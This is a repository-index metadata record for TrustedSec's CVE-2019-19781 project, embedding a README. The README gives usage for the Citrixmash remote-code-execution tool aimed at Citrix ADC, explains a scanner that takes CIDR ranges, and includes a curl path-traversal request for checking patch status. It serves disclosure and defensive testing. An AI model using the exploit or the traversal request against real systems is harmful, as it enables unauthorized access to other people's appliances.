{"id":20563738,"url":"https://github.com/trustedsec/cve-2019-19781","last_synced_at":"2025-04-04T23:08:53.986Z","repository":{"id":39222943,"uuid":"233151210","full_name":"trustedsec/cve-2019-19781","owner":"trustedsec","description":"This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.","archived":false,"fork":false,"pushed_at":"2020-01-22T20:23:51.000Z","size":81,"stargazers_count":573,"open_issues_count":0,"forks_count":127,"subscribers_count":28,"default_branch":"master","last_synced_at":"2025-03-28T22:13:43.403Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/trustedsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-01-11T00:08:27.000Z","updated_at":"2025-03-19T11:38:37.000Z","dependencies_parsed_at":"2022-09-04T22:13:48.809Z","dependency_job_id":null,"html_url":"https://github.com/trustedsec/cve-2019-19781","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fcve-2019-19781","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fcve-2019-19781/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fcve-2019-19781/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fcve-2019-19781/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/trustedsec","download_url":"https://codeload.github.com/trustedsec/cve-2019-19781/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247261609,"owners_count":20910108,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-16T04:20:36.315Z","updated_at":"2025-04-04T23:08:53.963Z","avatar_url":"https://github.com/trustedsec.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2019-19781\n\nThis was only uploaded due to other researchers publishing their code first. We would have hoped to have had this hidden for awhile longer while defenders had appropriate time to patch their systems.\n\nWe are all for responsible disclosure, in this case - the cat was already out of the bag.\n\nExploits: CVE-2019-19781\n\n## Citrixmash (CVE-2019-19781 exploit)\n\nroot@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# python citrixmash.py \n\nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\nTool Written by: Rob Simon and Dave Kennedy\nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com\nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/\nForensics and IOCS: https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/\n\nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used\nto append files in an XML format to the victim machine. This in turn allows for remote code execution.\n\nBe sure to cleanup these two file locations:\n    /var/tmp/netscaler/portal/templates/\n    /netscaler/portal/templates/\n\nNote that DNS hostnames and IP addresses are supported in victimaddress and attackerip_listener fields.\n\nUsage:\n\npython citrixmash.py \u003cvictimaddress\u003e \u003cvictimport\u003e \u003cattackerip_listener\u003e \u003cattacker_port\u003e\n\nusage: citrixmash.py [-h] target targetport attackerip attackerport\n\n## CVE-2019-19781 Scanner\n\nThis is a simple test to see if the server is still vulnerable to CVE-2019-19781.\n\nUsage: python3 cve-2019-19781.py \u003cserverip\u003e \u003cserverport\u003e\n\nNote you can use CIDR notations such as 192.168.1.1/24 and hostnames as well.\n\nIt will result if the server is still vulnerable or not. You can only do one server at a time.\n\nCVE-2019-19781-Scanner\nCompany: TrustedSec\nWritten by: Dave Kennedy\nThis will look to see if the remote system is still vulnerable to CVE-2019-19781. This \nwill only scan one host at a time.\nYou can use CIDR notations as well for example: 192.168.1.1/24\nYou can use hostnames instead of IP addresses also.\nYou can also use a file with IP addresses generated by an external tool.\n\nExample: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443\nExample2: python3 cve-2019-19781_scanner.py 192.168.1.1 443\nExample3: python3 cve-2019-19781_scanner.py fakewebsiteaddress.com 443\nExample4: python3 cve-2019-19781_scanner.py as15169 443\nExample5: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 verbose\nExample6: python3 cve-2019-19781_scanner.py file:hostfile 443\n\nUsage: python3 cve-2019-19781_scanner.py targetip targetport\n\nusage: cve-2019-19781_scanner.py [-h] target targetport [verbose]\n\n\n## Manually Validate Patch\n\nIf you want to test to see if this exposure is mitigated use the following:\n\n`curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is`\n\nOr if you are using non public or internal enterprise CA, you can override using the --insecure option\n\n`curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure`\n\nEither a 403 means that you are patched or if it returns a Citrix website and NOT the smb.conf file itself.\n\nIf you can see smb.conf, then you are vulnerable.\n\n## Installation\n\nTo install the requirements, you will need to run the command below. \n\npip3 install -r requirements.txt\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrustedsec%2Fcve-2019-19781","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftrustedsec%2Fcve-2019-19781","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrustedsec%2Fcve-2019-19781/lists"}